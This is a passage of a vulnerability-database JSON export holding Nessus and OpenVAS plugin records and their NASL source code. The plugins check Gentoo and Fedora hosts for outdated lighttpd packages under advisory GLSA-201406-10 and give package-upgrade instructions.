Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2c07a9704b62a4fe5f667357e64028da8a222c6c1e3966bfd093af7eecdaa601", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "0398ca8d1d69ac0e8ceaf9708dcea515", "key": "sourceData"}, {"hash": "8c669a229bb7e8ad8fcc835ab88c475a", "key": "modified"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2017-10-29T13:35:36", "modified": "2016-05-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory 
GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:46:29 $\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_osvdb_id(99365, 99759, 99760, 104381);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:35:36"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-02-21T01:21:54", "references": [{"idList": ["PACKETSTORM:118282"], "type": "packetstorm"}, {"idList": ["LIGHTTPD_1_4_34.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "FEDORA_2014-2506.NASL", "DEBIAN_DSA-2795.NASL", "FREEBSD_PKG_1CD3CA4233E611E2A2555404A67EEF98.NASL", "FEDORA_2014-2495.NASL", "OPENSUSE-2014-43.NASL", "LIGHTTPD_1_4_32.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "ALA_ALAS-2014-299.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-17319"], "type": "zdt"}, {"idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13626", "SECURITYVULNS:DOC:30381", "SECURITYVULNS:VULN:13405"], "type": "securityvulns"}, {"idList": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "cve"}, {"idList": ["EDB-ID:22902", "EDB-ID:18295"], "type": "exploitdb"}, {"idList": ["GLSA-201406-10"], "type": "gentoo"}, {"idList": ["OPENVAS:867539", "OPENVAS:1361412562310120553", "OPENVAS:1361412562310120162", "OPENVAS:1361412562310867539", "OPENVAS:867540", "OPENVAS:1361412562310121213", "OPENVAS:866877", "OPENVAS:1361412562310867540", "OPENVAS:892795", "OPENVAS:1361412562310892795"], "type": "openvas"}, {"idList": ["SUSE-SU-2014:0474-1", "OPENSUSE-SU-2014:0449-1", "OPENSUSE-SU-2014:0496-1"], "type": "suse"}, {"idList": ["1CD3CA42-33E6-11E2-A255-5404A67EEF98", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "90B27045-9530-11E3-9D09-000C2980A9F3"], "type": "freebsd"}, {"idList": ["MYHACK58:62201788804"], "type": "myhack58"}, {"idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2877-1:CD2D1", 
"DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2368-1:91542"], "type": "debian"}, {"idList": ["SSV:60476", "SSV:72453", "SSV:61980", "SSV:24275", "SSV:76695", "SSV:30003", "SSV:26120"], "type": "seebug"}, {"idList": ["ALAS-2013-179", "ALAS-2014-299", "ALAS-2012-107"], "type": "amazon"}]}, "score": {"modified": "2019-02-21T01:21:54", "value": 8.2, "vector": "NONE"}}, "hash": "b5ed92c198c303f0e003edabcb645b031bb5113e201725ea6557070fd61f9431", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2019-02-21T01:21:54", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory 
GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 5}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 7, "lastseen": "2019-02-21T01:21:54"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c0470adc003771bc6ae5d6914349f929"}, {"key": "cvelist", "hash": "f346bc8435b78109bc682f41b009e5b5"}, {"key": "cvss", "hash": "ed80408f65b06df34ed6dfdb743af507"}, {"key": "description", "hash": "a05ab3ced445f2578684b24e5a530e18"}, {"key": "href", "hash": "38a5f873bbf7b0934702849e098af575"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "9ee165aded032a2baf9a181faf11a74c"}, {"key": "published", "hash": "20ba12b0faa8a5525529ad167476e074"}, {"key": "references", "hash": "6c5dba810aeab70d01eba769ffba08ab"}, {"key": "reporter", "hash": "eebc0e5cad997220d136d9e0c6386556"}, {"key": "sourceData", "hash": "650bdfae1cb37826e27306825abaf826"}, {"key": "title", "hash": "4e75371be5bbd5341cf892fef0e9c013"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f7c5243bea94ad0a00b130536c48084b8c1a121cf1a8580b7a3f9a8c3821c8ec", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310121213", "OPENVAS:1361412562310867539", 
"OPENVAS:1361412562310120162", "OPENVAS:867539", "OPENVAS:867540", "OPENVAS:892795", "OPENVAS:1361412562310867540", "OPENVAS:1361412562310892795", "OPENVAS:1361412562310120553", "OPENVAS:866877"]}, {"type": "gentoo", "idList": ["GLSA-201406-10"]}, {"type": "cve", "idList": ["CVE-2012-5533", "CVE-2011-4362", "CVE-2014-2323", "CVE-2013-4560", "CVE-2013-4559", "CVE-2013-4508"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13405", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:VULN:12116"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-299.NASL", "DEBIAN_DSA-2795.NASL", "FEDORA_2014-2506.NASL", "OPENSUSE-2014-43.NASL", "FEDORA_2014-2495.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "LIGHTTPD_1_4_34.NASL", "FEDORA_2013-15345.NASL", "OPENSUSE-2012-801.NASL"]}, {"type": "freebsd", "idList": ["90B27045-9530-11E3-9D09-000C2980A9F3", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "1CD3CA42-33E6-11E2-A255-5404A67EEF98"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2368-1:91542", "DEBIAN:DSA-2877-1:CD2D1"]}, {"type": "amazon", "idList": ["ALAS-2014-299", "ALAS-2013-179", "ALAS-2012-107", "ALAS-2014-346"]}, {"type": "seebug", "idList": ["SSV:30003", "SSV:60476", "SSV:76695", "SSV:26120", "SSV:24275", "SSV:72453", "SSV:61980"]}, {"type": "exploitdb", "idList": ["EDB-ID:22902", "EDB-ID:18295"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788804"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118282"]}, {"type": "zdt", "idList": ["1337DAY-ID-17319"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0449-1", "SUSE-SU-2014:0474-1"]}], "modified": "2019-11-01T02:40:33"}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-11-01T02:40:33"}, "vulnersScore": 8.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted 
from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif 
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "76062", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "scheme": null}
{"openvas": [{"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201406-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121213", "title": "Gentoo Security Advisory GLSA 201406-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201406-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121213\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:20 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201406-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in lighttpd. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201406-10\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201406-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/lighttpd\", unaffected: make_list(\"ge 1.4.35\"), vulnerable: make_list(\"lt 1.4.35\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867539", "title": "Fedora Update for lighttpd FEDORA-2014-2495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2495\n#\n# Authors:\n# System 
Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867539\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:21:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2495\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2495\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via 
the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:38", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867539", "id": "OPENVAS:867539", "title": "Fedora Update for lighttpd FEDORA-2014-2495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2495\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 